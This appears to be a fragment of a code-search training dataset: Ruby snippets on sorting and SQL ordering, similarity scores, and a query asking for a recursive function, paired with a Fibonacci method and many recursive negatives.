"def sort(table_name, list, sort_by, order, per_page, default)\r\n\r\n if table_name.has_attribute?(sort_by) && (order == \"asc\" || order == \"desc\")\r\n list = list.sort_by{|item| item[sort_by].to_s.downcase}\r\n if order == \"desc\"\r\n list = list.reverse\r\n end\r\n list \r\n else\r\n # default case\r\n list.sort_by{|item| item[default].downcase}\r\n end\r\n\r\n end",
"def sort_order # rubocop:disable Metrics/AbcSize, Metrics/MethodLength\n col = sort_column\n # do a case-insensitive sort if we are sort on last name\n col = \"lower(#{col})\" if col.include?('last_name')\n return Arel.sql(\"#{col} #{sort_direction}\") unless col.include?('enumerations')\n\n klass, method = col.split('.')\n values = klass.singularize.capitalize.constantize.send(method.intern)\n .order(Arel.sql(\"value #{sort_direction} \")).pluck('value')\n order_query = values.each_with_index.inject(+'CASE ') do |memo, (val, i)| # rubocop:disable Style/EachWithObject\n memo << \"WHEN( enumerations.value = '#{val}') THEN #{i} \"\n memo\n end\n Arel.sql(\"#{order_query} ELSE #{values.length} END\")\n end",
"def add_sort_order_to_title\n return unless params[:by]\n\n self.title_tag = :query_title_all_by\n title_args[:order] = :\"sort_by_#{params[:by].sub(/^reverse_/, \"\")}\"\n end",
"def order_by_cached_appeal_priority_clause\n Arel.sql(<<-SQL)\n (CASE\n WHEN cached_appeal_attributes.case_type = 'Court Remand' THEN 1\n ELSE 0\n END) DESC,\n cached_appeal_attributes.is_aod DESC,\n cached_appeal_attributes.docket_number ASC\n SQL\n end",
"def columns_order(klass)\n columns_symbol = klass.columns.map {|e| e.name.intern}\n\n # created_at and updated_at should be at the very end by default\n if columns_symbol.include? :created_at\n columns_symbol = (columns_symbol - [:created_at]) + [:created_at]\n end\n if columns_symbol.include? :updated_at\n columns_symbol = (columns_symbol - [:updated_at]) + [:updated_at]\n end\n\n if requested_order = AdminData.config.columns_order[klass.name]\n primary_key = klass.send(:primary_key).intern\n order = [primary_key] + requested_order\n order.uniq!\n # add the columns not covered by user at the end of the list\n sorted_columns = order + (columns_symbol - order)\n sorted_columns.map(&:to_s)\n else\n columns_symbol.map(&:to_s)\n end\n end",
"def all\n relation.order(\"CASE WHEN property_type IN ('land', 'mobile_home') THEN 1 ELSE 0 END, selling_date DESC\")\n end",
"def calls_sort_option\n column = case params[:iSortCol_0].to_s\n when '1'\n 'number'\n when '2'\n 'caller_id'\n when '3'\n 'providers.name'\n when '4'\n 'answered'\n when '5'\n 'busy'\n when '6'\n 'audio_length'\n when '7'\n 'ring_length'\n end\n column + ' ' + (params[:sSortDir_0] =~ /^A/i ? 'asc' : 'desc') if column\n end",
"def custom_sql\n \"SELECT bookings.full_name FROM bookings ORDER BY checkin DESC LIMIT 1;\"\nend",
"def default_order\n \"name\"\n end",
"def sort_column\n #songs_count is a specific query, so it's not in the Song table\n default = (params[:sort] == \"songs_count\") ? \"songs_count\" : \"name\"\n Song.column_names.include?(params[:sort]) ? params[:sort] : default\n end",
"def set_sortorder(order)\n puts \"RFilter.set_sortorder is DEPRECATED - use RFilter.set_sort_by_and_order instead\"\n self.sql_sortorder = order\n end",
"def condition_sort(input)\n poke_name = input.poke_name\n product_db = SearchRecord::For.klass(Entity::Product)\n case input.sort\n when 'id'\n product_db.find_full_name(poke_name)\n when 'likes_DESC'\n product_db.order_by_desc_likes(poke_name)\n when 'likes_ASC'\n product_db.order_by_asc_likes(poke_name)\n when 'rating_DESC'\n product_db.order_by_desc_rating(poke_name)\n when 'rating_ASC'\n product_db.order_by_asc_rating(poke_name)\n when 'price_DESC'\n product_db.order_by_desc_price(poke_name)\n else\n # priceASC\n product_db.order_by_asc_price(poke_name)\n end\n end",
"def sort_column\n \n @sort_field = ''\n if params[:sort].to_s == MadConstants.donor_name\n @sort_field = 'concat(donours.first_name,donours.last_name)'\n elsif params[:sort].to_s == MadConstants.donation_amount\n @sort_field = 'donations.donation_amount'\n elsif params[:sort].to_s == MadConstants.donation_type\n @sort_field = 'donations.donation_type'\n elsif params[:sort].to_s == MadConstants.product\n @sort_field = 'cfr_products.name'\n elsif params[:sort].to_s == MadConstants.fundraiser_name\n @sort_field = 'users.first_name'\n elsif params[:sort].to_s == MadConstants.donation_status\n @sort_field = 'donations.donation_status'\n elsif params[:sort].to_s == MadConstants.eighty_g_required\n @sort_field = 'donations.eighty_g_required'\n else\n @sort_field = 'donations.id' \n end\n \n Donation.joins(:donour).joins('inner join cfr_products as cfr_products on cfr_products.id = donations.product_id').\n joins('inner join users as users on users.id = donations.fundraiser_id').\n cfr_txn_search(params[:search]).order(@sort_field + ' ' + sort_direction).\n paginate(:per_page => 10, :page => params[:page])\n end",
"def order\n end",
"def order_by_column\n target_class.clustering_columns.first.name if target_class.clustering_columns.any?\n end",
"def order_by_column\n target_class.clustering_columns.first.name if target_class.clustering_columns.any?\n end",
"def set_OrderBy(value)\n set_input(\"OrderBy\", value)\n end",
"def set_OrderBy(value)\n set_input(\"OrderBy\", value)\n end",
"def set_OrderBy(value)\n set_input(\"OrderBy\", value)\n end",
"def set_OrderBy(value)\n set_input(\"OrderBy\", value)\n end",
"def set_OrderBy(value)\n set_input(\"OrderBy\", value)\n end",
"def set_OrderBy(value)\n set_input(\"OrderBy\", value)\n end",
"def set_OrderBy(value)\n set_input(\"OrderBy\", value)\n end",
"def set_OrderBy(value)\n set_input(\"OrderBy\", value)\n end",
"def order(*args)\r\n args.map!{ |arg| arg.is_a?(Hash) ? arg.map{ |k,v| \"#{k} #{v.upcase}\"} : arg }\r\n order = args.flatten(2).join(\", \")\r\n\r\n rows = connection.execute <<-SQL\r\n SELECT * FROM #{table}\r\n ORDER BY #{order};\r\n SQL\r\n\r\n rows_to_array(rows)\r\n end",
"def orders\n super.complete.order('completed_at DESC, id DESC')\n end",
"def desc\n if @order_by.nil?\n raise Exceptions::IllegalStateException, 'You must call order_by method before call this method'\n end\n\n @order_by.asc = false\n\n self\n end",
"def order_by(class_name)\n if class_name == 'Group'\n 'name'\n elsif class_name == 'EmailMessage'\n 'subject' # TODO or add created_at to model and use as sort field\n else \n 'id'\n end\n end",
"def order(*args)\n sql_records = records.__send__ :order, *args\n\n # Redefine the `to_a` method to the original one\n #\n sql_records.instance_exec do\n define_singleton_method(:to_a) do\n if defined?(::ActiveRecord) && ::ActiveRecord::VERSION::MAJOR >= 4\n self.load\n else\n self.__send__(:exec_queries)\n end\n @records\n end\n end\n\n sql_records\n end",
"def search_get_order_sql(sort_by, order_by, default)\n sql = []\n\n sort_by.each_with_index do |value, index|\n next if value.blank?\n next if order_by[index].blank?\n\n sql.push( \"#{ActiveRecord::Base.connection.quote_table_name(table_name)}.#{ActiveRecord::Base.connection.quote_column_name(value)} #{order_by[index]}\" )\n end\n\n if sql.blank?\n sql.push(\"#{ActiveRecord::Base.connection.quote_table_name(table_name)}.#{ActiveRecord::Base.connection.quote_column_name(default)}\")\n end\n\n sql.join(', ')\n end"
] |
[
"0.7568424",
"0.698313",
"0.6902242",
"0.6886363",
"0.66674477",
"0.6592575",
"0.6558681",
"0.6516834",
"0.65005857",
"0.64718646",
"0.64700437",
"0.6464869",
"0.64216065",
"0.6406529",
"0.6398351",
"0.63810825",
"0.63709253",
"0.636094",
"0.6352644",
"0.6337956",
"0.6326532",
"0.62711793",
"0.62477636",
"0.62477636",
"0.6233016",
"0.6219032",
"0.62167567",
"0.62037575",
"0.61896515",
"0.61851966",
"0.61841863",
"0.61733377",
"0.61673",
"0.6165263",
"0.6162077",
"0.6147631",
"0.6138932",
"0.6138721",
"0.6138721",
"0.6128456",
"0.61206067",
"0.6105761",
"0.61045176",
"0.6098472",
"0.6097312",
"0.60942125",
"0.60942125",
"0.60942125",
"0.60803175",
"0.6068937",
"0.6063763",
"0.6061862",
"0.6056947",
"0.6056947",
"0.60532653",
"0.60464144",
"0.60404783",
"0.6040121",
"0.6030552",
"0.6018192",
"0.6016262",
"0.6006497",
"0.6003439",
"0.6000568",
"0.59906596",
"0.59814304",
"0.59749395",
"0.59722984",
"0.5964931",
"0.59569025",
"0.59568787",
"0.5952323",
"0.59290314",
"0.5928589",
"0.59214246",
"0.59183997",
"0.59154874",
"0.59149164",
"0.5913507",
"0.591341",
"0.58992726",
"0.58923763",
"0.588792",
"0.5884922",
"0.5881628",
"0.5881628",
"0.58792967",
"0.58792967",
"0.58792967",
"0.58792967",
"0.58792967",
"0.58792967",
"0.58792967",
"0.58792967",
"0.5870357",
"0.5857288",
"0.58553964",
"0.585229",
"0.5851783",
"0.58477193"
] |
0.5925506
|
74
|
build a recursive function
|
def fibs(j,k)
@goal = 4000000
i = j
j = k
k = i + j
unless k > @goal
@fib_array << k
fibs(j,k)
end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def recursive => nil",
"def recursive_solution\n\n end",
"def generate_recursive(length)\n _generate(length, 0, '')\nend",
"def recursive_factorial(number)\n\nend",
"def recursive_factorial(number)\n\nend",
"def fibonacciRecurse(a,b,depth)\n\tif depth>0\n\t\treturn String(a+b)+\" \"+fibonacciRecurse(b, a+b, depth-1)\n\telse\n\t\treturn \"\"\n\tend\nend",
"def factorials_rec(num)\n # p num\n # p \"num #{num} \"\n if num <= 0\n return [1]\n end\n if num == 1\n return [1]\n end\n if num == 2\n return [1, 1]\n end\n # p factorial(3)\n # factorial = num-1 * factorials_rec(num-2)\n # p factorial\n return factorials_rec(num-1) + [factorial(num-1)]\n \nend",
"def build_tree(arr)\n\tend",
"def recursive_print(array)\n\nend",
"def factorials_rec(num)\n return 'error' if num < 0\n return [1] if num == 1\n return [1, 1] if num == 2\n fac = factorials_rec(num - 1)\n fac << fac.last * (num - 1)\n fac\n\nend",
"def factorials_rec(num)\n return [1] if num == 1\n return [] if num == 0\n prev_seq = factorials_rec(num-1)\n prev_seq << factorials(num)\n prev_seq\n\nend",
"def factorial_recursive(num)\n if num == 0\n 1\n else \n num * factorial_recursive(num-1)\n \n # 7 * 6 = 42\n # 42 * 5 = 210\n # 210 * 4 = 840\n # 840 * 3 = 2520\n # 2520 *2 = 5040\n # 5040* 1 = 5040\n end\nend",
"def factorial_recursive(n)\n\tif n == 0\n\t\treturn 1 # 0! = 1\n\telse\n\t\treturn n*factorial_recursive(n-1) #keep calling the function\n\tend\nend",
"def factorials_rec(num)\n return [1] if num <= 1\n\n result = factorials_rec(num-1)\n result << (num-1) * result[-1]\n\nend",
"def rec_factorial(n)\n if n==0\n return 1\n end\n return rec_factorial(n-1)*n\nend",
"def factorial_recursive(n)\n return 1 if n == 0\n n * factorial_recursive(n-1)\nend",
"def factorial_recursive(n)\n n.zero? ? 1 : n * factorial_recursive(n - 1)\nend",
"def nested(s)\n # this is a wrapper method\n return nested_2(s, 0, (s.length - 1) )\nend",
"def sum_recurse(num)\n return 0 if num == 0\n num[0] + sum_recurse(num.delete(1))\nend",
"def factorial_recursive(n)\n if n == 1\n return 1\n end\n return n * factorial_recursive(n-1)\nend",
"def recursion(number)\n if number == 1\n return number\n else\n p number\n recursion(number - 1)\n end\nend",
"def factorials_rec(num)\n if num == 1\n [1]\n else\n factorial = factorials_rec(num - 1)\n factorial << (num - 1) * factorial[-1]\n end\nend",
"def factorial_recursive n\n return 1 if n == 0\n n * factorial_recursive(n-1)\nend",
"def fibonacci(depth)\n\ti=0\n\tstart = \"\"\n\twhile i<depth and i<2\n\t\tstart=start+\"1 \"\n\t\ti+=1\n\tend\n\treturn start+fibonacciRecurse(1,1,depth-2)\nend",
"def make_pattern(array = [], number) # Define a method with two paremeter one array which will be the output and another one which is the given number.\r\n if number <= 0 # This is our base case it will stop if the number is 0 or less than that.\r\n array << number #Then we will push the number in to the array.\r\n\t\tarray << array.reverse #Now we will push the array in to it self, But in reverse order.\r\n\t\tarray.flatten! # At this two point we have a nested array it should be turn to one array.\r\n array.delete_at(array.length / 2) # Now there is a problem in our array the middle element of the array is repeated twice.So we delete one.\r\n return array # The array is ready to be called.\r\n end\r\n array << number # It pushes the number in to array \r\n make_pattern(array , number - 5) # This will make our method recursive.It will deduct 5 from our number at each time the method execute.\r\nend",
"def factorial_recursive(n)\n if n == 0\n 1\n else\n n * factorial_recursive(n-1)\n end\nend",
"def factorial_recursive(n)\n if n == 0\n 1\n else\n n * factorial_recursive(n-1)\n end\nend",
"def build_tree( n , d )\n \n if d.key?('v')\n n < d['v'] ? build_tree(n , d['l']) : build_tree(n, d['r'])\n else\n d['l'] = {}\n d['v'] = n\n d['r'] = {}\n end\n \nend",
"def factorials_rec(num)\n #6 == [0!, 1!, 2!, 3!, 4!, 5!]\n return [1] if num == 1\n\n factorials_rec(num-1) + [(num-1) * factorials_rec(num-1).last]\nend",
"def perm_recur(ans=\"\",s)\n if s.length == 0\n return\n end\n\n if s.length == 1\n puts ans + s\n return\n end\n \n if s.length == 2\n puts ans + s[0] + s[1] \n puts ans + s[1] + s[0]\n return\n end\n\n (0..s.size-1).each do |l|\n new = s.chars.rotate(l).join('')\n element = new[0] \n rest = new[1..new.size-1]\n perm_recur(ans + element, rest)\n end\nend",
"def recursive_factorial(n)\n return 1 if n < 1\n\n n * recursive_factorial(n - 1)\nend",
"def factorials_rec(num)\n return [1] if num==1\n return [1,1] if num==2\n factorials_rec(num-1) + [(num-1) * factorials_rec(num-1).last]\nend",
"def factorials_rec(num)\n return [1] if num == 1\n\n factorials_rec(num-1) << factorials_rec(num-1).last * (num - 1)\nend",
"def generate_parenthesis_recursive(open, closed)\n if closed < open || closed < 0 || open < 0\n return []\n end\n\n if open == 1 && closed == 0\n return [\"(\"]\n elsif open == 0 && closed == 1\n return [\")\"]\n end\n\n combinations = []\n combinations += generate_parenthesis_recursive(open - 1, closed).map {|a| \"(#{a}\"}\n combinations += generate_parenthesis_recursive(open, closed - 1).map {|a| \")#{a}\"}\n\n combinations\nend",
"def factorial_recursive(n)\n\tif (n==0)\n\t\treturn 1\n\telse\n\t\t\treturn n*factorial_recursive(n-1)\n\tend\nend",
"def sum_recur(array)\n#for array = []\n return 0 if array == []\n\n first_el = array.shift\n recursive_call = sum_recur(array)\n first_el + recursive_call\n\nend",
"def factorial_recursive(n)\n if n < 0\n \"Invalid input\"\n elsif n == 0\n 1\n else\n n *= factorial_recursive(n-1)\n end\nend",
"def factorials_rec(num)\n return [1] if num == 1\n prev = factorials_rec(num - 1)\n prev << prev[-1] * (num - 1)\n prev\nend",
"def esxlRecurse i, j\n esxlStraightRecurse(i, j) + esxlDiagonalRecurse(i, j)\nend",
"def recursive_fac(num)\n return num if num == 1\n tail_rec(num - 1) * num\nend",
"def iterate_function(start_value, function)\n Node.new(start_value, lambda{ iterate_function( function.call(start_value), function ) })\nend",
"def factorial_recursive(n)\n\t\tif n == 1\n\t\t\treturn 1\n\t\telse\n\t\t\tn * factorial_recursive(n-1)\n\t\tend\n\tend",
"def recursion(n)\n if n % 2 ==0\n n\n else\n recursion(n + 1)\nend\nend",
"def factorial_recursive(num = 0)\n # this is a guard clause\n return \"Can not calculate factorial of a negative number\" if num < 0\n\n if num <= 1\n 1 # this is our base case\n else\n num * factorial_recursive(num - 1) # this is where the recursion happens\n end\nend",
"def factorials_rec(num)\n return [1] if num == 1\n\n facs = factorials_rec(num - 1)\n facs << facs.last * (num - 1)\n facs\n\n\nend",
"def factorials_rec(num)\n return [1] if num <= 1\n res = factorials_rec(num-1)\n res.concat([(num-1)*res[-1]])\nend",
"def sum_recursively(num)\n return num if num == 0\n sum_recursively(num-1) + num\nend",
"def rec_build(level, direction, rotation, fractal_list)\r\n # At the lowest level, add an actual piece to the array\r\n if (level == 0)\r\n fractal_list.push((direction + rotation) % 360)\r\n return\r\n end\r\n \r\n # At higher levels, we need to define the shape of the fractal\r\n for piece_direction in @base_fractal\r\n rec_build(\r\n level - 1, # Drill down to the next level\r\n piece_direction, # Take direction from the base array\r\n (direction + rotation) % 360, # Rotate lower-level according to higher level structure\r\n fractal_list) # Append to the list\r\n end\r\n end",
"def compile_helper(multiD, path, oneD)\n # Check if the helper function has called for the first time.\n if not path.eql?(\"\")\n path = path + \"/\"\n end\n\n multiD.each do |key, value|\n\n # If the value is a nother container, recursively call the helper function and pass the value, \n # the current path as well as the current key and finally the associative array.\n if value.kind_of?(Hash)\n oneD = compile_helper(value, path + key.to_s, oneD)\n\n # If the value is an array, create a new path for each element. Use index as the path.\n elsif value.kind_of?(Array) then\n i = 0\n value.each do |element|\n oneD.store(path + key.to_s + \"/\" + i.to_s, element)\n i += 1\n end\n # Else, store the path as the key and the number as the value.\n else \n oneD.store(path + key.to_s, value)\n end\n\n end\n\n return oneD\nend",
"def factorial_rec(num)\n return [1] if num == 1\n res = factorial_rec(num - 1)\n res << (num - 1) * res[-1]\nend",
"def factorials_rec(num)\n if num == 1\n return [1]\n else\n facs = factorials_rec(num - 1)\n facs << facs.last * (num - 1)\n facs\n end\nend",
"def rec_r(depth, arr)\n return arr if depth == 0\n\n rec_r(depth-1, arr.map do |v|\n ['a', 'b', 'c'].map do |chr|\n v + chr\n end\n end.flatten)\nend",
"def factorials_rec(num)\n if num == 1\n [1]\n else\n recs = factorials_rec(num - 1)\n recs << (num - 1) * recs.last\n end\nend",
"def recurse_call(*args)\n # # create a state for the call.\n # call_state = SequencerT.current.step\n\n # Get the variables for handling the stack overflow.\n stack_ptr = @stack_ptr\n depth = @depth \n argsIdx = @argsIdx\n this = self\n\n # Adds the argument to the stack if no overflow.\n HDLRuby::High.top_user.hif(stack_ptr < depth) do\n # hprint(\"stack_ptr=\",stack_ptr,\" depth=\",depth,\"\\n\")\n # Adds the arguments and the return state to the current stack frame.\n # Since not pushed the stack yet for not loosing the previous\n # arguments, add +1 to the offset when poking the new arguments.\n # args.each_with_index { |arg,i| self.poke(@argsIdx + i,arg,1) }\n args.each_with_index { |arg,i| this.poke(argsIdx + i,arg,1) }\n end\n\n # Push a new frame.\n self.push_all\n\n # create a state for the call.\n call_state = SequencerT.current.step\n\n # Prepare the handling of overflow\n call_state_value = call_state.value\n overflow = @funcE.overflow\n if overflow then\n HDLRuby::High.top_user.hif(stack_ptr > depth) do\n HDLRuby::High.top_user.instance_exec(&overflow)\n end\n end\n\n # Get the state value of the function: it is the state\n # following the first function call.\n func_state_value = @state.value + 1\n # Do the call.\n call_state.gotos << proc do\n HDLRuby::High.top_user.instance_exec do\n hif(stack_ptr <= depth) do\n next_state_sig <= func_state_value\n end\n helse do\n # Overflow! Skip the call.\n next_state_sig <= call_state_value + 1\n # if overflow then\n # # There is some overflow code to execute.\n # HDLRuby::High.top_user.instance_exec(&overflow)\n # end\n end\n end\n end\n\n return call_state\n end",
"def produce_tree(ary); end",
"def solution(t)\n # write your code in Ruby 2.2\n depth = 0\n childs = []\n\n childs << t.l if t.l\n childs << t.r if t.r\n\n while not childs.empty? do\n depth += 1\n\n cc = []\n childs.each do |t|\n cc << t.l if t.l\n cc << t.r if t.r\n end\n\n childs = cc\n end\n\n depth\nend",
"def factorials_rec(num)\n return [1] if num == 1\n fact = factorials_rec(num-1)\n fact << fact.length * fact[-1]\nend",
"def factorials_rec(num)\n return [1] if num == 0\n return [1] if num == 1\n \n prev = factorials_rec(num-1)\n prev << (num-1) * prev[-1]\nend",
"def rec_sum(num)\n return num if num <= 1\n num + rec_sum(num - 1)\nend",
"def factorials_rec(num)\n return [1] if num <= 1\n fact = factorials_rec(num-1)\n fact << (num-1) * fact.last\nend",
"def bitonic_recurse(arr, low, count, direction)\n return if count <= 1\n\n mid = count / 2\n bitonic_recurse(arr, low, mid, 1)\n bitonic_recurse(arr, low + mid, mid, -1)\n bitonic_merge(arr, low, count, direction)\n arr\nend",
"def factorials_rec(num)\n return [1] if num == 1\n facs = factorials_rec(num - 1)\n facs << facs.last * (num - 1)\n facs\nend",
"def rec_fib(n)\r\n return [0] if n == 0\r\n return [0,1] if n ==1\r\n return [0,1,1] if n ==2\r\n \r\n rec_fib(n-1) << (rec_fib(n-1)[-1] + rec_fib(n-2)[-1]) \r\n\r\nend",
"def my_controlled_flatten(n=1)\n #here\n return self if n < 1\n\n results = []\n self.each do |el|\n if el.class == Array\n #here\n results += el.my_controlled_flatten(n-1)\n else\n results << el\n end\n end\n\n results\n\n end",
"def factorials_rec(num)\n return [1] if num == 1\n facs = factorials_rec(num - 1)\n facs << facs[-1] * (num - 1)\nend",
"def factorials_rec(num)\n if num == 1\n [num]\n else\n factorials = factorials_rec(num - 1)\n factorials << factorials.last * (num - 1)\n factorials\n end\nend",
"def sum_recursive(num)\n # can also compute sum with symbol (1..5).inject(:+)\n (1..num).inject { |sum, n| sum + n }\nend",
"def funcion\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 57 )\n\n\n return_value = FuncionReturnValue.new\n\n # $rule.start = the first token seen before matching\n return_value.start = @input.look\n\n\n root_0 = nil\n\n __K_DEF303__ = nil\n __K_FUNC304__ = nil\n __Identificador305__ = nil\n __LPAR306__ = nil\n __RPAR308__ = nil\n __LLAIZQ309__ = nil\n __LLADER311__ = nil\n parametros_tipos307 = nil\n bodyexp310 = nil\n\n\n tree_for_K_DEF303 = nil\n tree_for_K_FUNC304 = nil\n tree_for_Identificador305 = nil\n tree_for_LPAR306 = nil\n tree_for_RPAR308 = nil\n tree_for_LLAIZQ309 = nil\n tree_for_LLADER311 = nil\n\n begin\n root_0 = @adaptor.create_flat_list\n\n\n # at line 259:4: K_DEF K_FUNC Identificador LPAR ( parametros_tipos )? RPAR LLAIZQ bodyexp LLADER\n __K_DEF303__ = match( K_DEF, TOKENS_FOLLOWING_K_DEF_IN_funcion_1280 )\n if @state.backtracking == 0\n tree_for_K_DEF303 = @adaptor.create_with_payload( __K_DEF303__ )\n @adaptor.add_child( root_0, tree_for_K_DEF303 )\n\n end\n\n __K_FUNC304__ = match( K_FUNC, TOKENS_FOLLOWING_K_FUNC_IN_funcion_1282 )\n if @state.backtracking == 0\n tree_for_K_FUNC304 = @adaptor.create_with_payload( __K_FUNC304__ )\n @adaptor.add_child( root_0, tree_for_K_FUNC304 )\n\n end\n\n __Identificador305__ = match( Identificador, TOKENS_FOLLOWING_Identificador_IN_funcion_1284 )\n if @state.backtracking == 0\n tree_for_Identificador305 = @adaptor.create_with_payload( __Identificador305__ )\n @adaptor.add_child( root_0, tree_for_Identificador305 )\n\n end\n\n __LPAR306__ = match( LPAR, TOKENS_FOLLOWING_LPAR_IN_funcion_1286 )\n if @state.backtracking == 0\n tree_for_LPAR306 = @adaptor.create_with_payload( __LPAR306__ )\n @adaptor.add_child( root_0, tree_for_LPAR306 )\n\n end\n\n # at line 259:36: ( parametros_tipos )?\n alt_42 = 2\n look_42_0 = @input.peek( 1 )\n\n if ( look_42_0 == TIPO )\n alt_42 = 1\n end\n case alt_42\n when 1\n # at line 259:36: parametros_tipos\n @state.following.push( TOKENS_FOLLOWING_parametros_tipos_IN_funcion_1288 )\n parametros_tipos307 = parametros_tipos\n @state.following.pop\n if @state.backtracking == 0\n @adaptor.add_child( root_0, parametros_tipos307.tree )\n end\n\n\n end\n __RPAR308__ = match( RPAR, TOKENS_FOLLOWING_RPAR_IN_funcion_1291 )\n if @state.backtracking == 0\n tree_for_RPAR308 = @adaptor.create_with_payload( __RPAR308__ )\n @adaptor.add_child( root_0, tree_for_RPAR308 )\n\n end\n\n __LLAIZQ309__ = match( LLAIZQ, TOKENS_FOLLOWING_LLAIZQ_IN_funcion_1293 )\n if @state.backtracking == 0\n tree_for_LLAIZQ309 = @adaptor.create_with_payload( __LLAIZQ309__ )\n @adaptor.add_child( root_0, tree_for_LLAIZQ309 )\n\n end\n\n @state.following.push( TOKENS_FOLLOWING_bodyexp_IN_funcion_1295 )\n bodyexp310 = bodyexp\n @state.following.pop\n if @state.backtracking == 0\n @adaptor.add_child( root_0, bodyexp310.tree )\n end\n\n __LLADER311__ = match( LLADER, TOKENS_FOLLOWING_LLADER_IN_funcion_1297 )\n if @state.backtracking == 0\n tree_for_LLADER311 = @adaptor.create_with_payload( __LLADER311__ )\n @adaptor.add_child( root_0, tree_for_LLADER311 )\n\n end\n\n\n # - - - - - - - rule clean up - - - - - - - -\n return_value.stop = @input.look( -1 )\n\n\n if @state.backtracking == 0\n return_value.tree = @adaptor.rule_post_processing( root_0 )\n @adaptor.set_token_boundaries( return_value.tree, return_value.start, return_value.stop )\n\n end\n\n rescue ANTLR3::Error::RecognitionError => re\n report_error(re)\n recover(re)\n return_value.tree = @adaptor.create_error_node( @input, return_value.start, @input.look(-1), re )\n\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 57 )\n\n\n end\n\n return return_value\n end",
"def fiboRec(no)\n if no == 0\n return [0]\n elsif no == 1\n return fiboRec(0).push(1)\n else\n arr = fiboRec(no-1)\n return arr.push(arr[no-1] + arr[no-2])\n end\nend",
"def recursive_tower_of_hanoi(start,extra,end)\r\n\r\n #code here\r\nend",
"def fn(s)\n\t# Not only that, but since I heard you liked functions, I put a\n\t# function IN YOUR FUNCTION.\n\t#\n\t# And not only that, THAT function is a recursive function\n\t# We'll call it sub, cause we're original.\n\t#\n\t# It takes more parameters:\n\t# s : the string we're parsing\n\t# i : an index to remember how many steps we did already\n\t# floor : the floor we're in at the moment\n\tdef sub(s, i, floor)\n\t\treturn i if floor < 0\n\n\t\t# A recursive function is a function which calls itself\n\t\t# here, we call ourself with different parameters:\n\t\t# s[1, s.length-1] : We remove the first character from the string\n\t\t# i+1 : We increase the number of steps we did already\n\t\t# floor + (s[0] == '(' ? 1 : -1 ) : We add 1 or subtract 1 depending on\n\t\t# wether the first character from the string is '(' or ')'\n\t\tsub(s[1, s.length-1], i+1, floor + (s[0] == '(' ? 1 : -1 ))\n\tend\n\n\t# Here is the first call to the recursive sub function:\n\t# We start with the full string, on the 0th step, on floor 0\n\tsub(s, 0, 0)\nend",
"def tail_rec_factorial(n)\n return tail_rec_factorial_(n, 1)\nend",
"def nested(s)\n # return nested_helper(s[1..-1])\n paren_end = s.index(')')\n return !s.include?('(') if paren_end.nil? \n\n paren_start = s[0...paren_end].rindex('(')\n\n return false if paren_start.nil?\n\n return nested(s[1..paren_start]+s[paren_end+1..-1])\n\nend",
"def factorials_rec(num)\n return [1] if num == 1\n prev = factorials_rec(num - 1)\n prev << (num - 1) * prev[-1]\nend",
"def depth=(_arg0); end",
"def recursive_function(solutions, s)\n # puts \"BEGINNING RECURSIVE FUNCTION\" #NICE TO HAVE\n # print_board s[:moves] #NICE TO HAVE\n if not validate_state(s)\n return false\n end\n if check_solved(s)\n s[:solved] = true\n # puts \"A solution has been found.\" #NICE TO HAVE\n # print_state_data(s) #NICE TO HAVE\n solutions.push(deep_copy_solution(s[:moves]))\n return true\n end\n derive_moves_metadata(s)\n poss_moves = get_poss_next_moves(s)\n # This given thing actually doesn't work yet.\n # I need to make sure that the given thing only gets triggered when the two\n # moves that this one is based on are ALSO given.\n # Iow, given moves can only come from pre-existing given moves.\n # TODO: Get the below portion of code figured out.\n # Read the above TODO comment about this for more information and\n # possible alternative approaches to optimizing around given moves.\n #\n # if poss_moves.length == 1\n # s[:given_moves].push(s[:m]) # THIS LINE NEEDS TO BE TESTED !!!***\n # puts \"Move \" + s[:m].to_s + \" has been discovered to be given.\"\n # print_state_data(s)\n # end\n while not poss_moves.empty?\n # puts \"poss_moves: \" + poss_moves.to_s #NICE TO HAVE\n s[:prospective_move] = poss_moves.shift()\n s[:prospective_move][:r] = s[:regions][s[:prospective_move][:y]][s[:prospective_move][:x]]\n apply_move(s)\n recursive_function(solutions, s)\n undo_move(s)\n # print_board s[:moves] #NICE TO HAVE\n end\n return s\nend",
"def factorials_rec(num)\n return [] if num == 0\n return [1] if num == 1\n prev = factorials_rec(num - 1)\n prev + [prev.last * (num - 1)]\nend",
"def expansion(n)\n \"1 + 1/#{nesting(n)}\"\nend",
"def factorials_rec(num)\n if num == 1\n [1]\n else\n facs = factorials_rec(num - 1)\n facs << facs.last * (num - 1)\n facs\n end\nend",
"def factorials_rec(num)\n if num == 1\n [1]\n else\n facs = factorials_rec(num - 1)\n facs << facs.last * (num - 1)\n facs\n end\nend",
"def factorials_rec(num)\n if num == 1\n [1]\n else\n facs = factorials_rec(num - 1)\n facs << facs.last * (num - 1)\n facs\n end\nend",
"def factorials_rec(num)\n return 1 if num == 0 \n return [1] if num == 1\n fact = [1]\n\n fact << [(fact[-1] * factorials_rec(num-1))]\n# (2) \n# 4 * fact_rc(3) 2\n# 3 * fact_rc(2) 6\n# 2 * fact_rc(1) 2\n# 1 * fact(rc 0 )\nend",
"def factorials_rec(num)\n return [1] if num == 1\n\n facs = factorials_rec(num - 1)\n facs << facs.last * num\n\n facs\nend",
"def dfs_rec(target,current,array_length,stack,visited)\n left = current.find_left_child[0]\n right = current.find_right_child[0]\n parent = current.find_parent[0]\n if current.value == target\n return current\n elsif visited.length == array_length\n return nil\n elsif !left.nil? && !visited.include?(left)\n stack.push(left)\n visited.push(left)\n dfs_rec(target,left,array_length,stack,visited)\n elsif !right.nil? && !visited.include?(right)\n stack.push(right)\n visited.push(right)\n dfs_rec(target,right,array_length,stack,visited)\n else\n stack.pop\n dfs_rec(target,parent,array_length,stack,visited)\n end\nend",
"def build_default_proc(_left, _right, _total, _path, _last_height)\n ->(h, level) do\n left, right, total, path, last_height = _left, _right, _total, _path, _last_height\n levels = level - last_height\n if path == 1\n increase = left * levels\n path = 0\n total += increase\n right += increase\n else\n increase = right * levels\n path = 1\n total += increase\n left += increase\n end\n last_height = level\n nested = {\n left: left,\n right: right,\n total: total,\n path: path,\n next: nested\n }\n nested.default_proc = build_default_proc(left, right, total, path, last_height)\n\n\n h[level] = nested\n end\nend",
"def factorials_rec(num)\n return [1] if num == 1\n factorials_rec(num-1) + [(1...num).to_a.reduce(:*)]\nend",
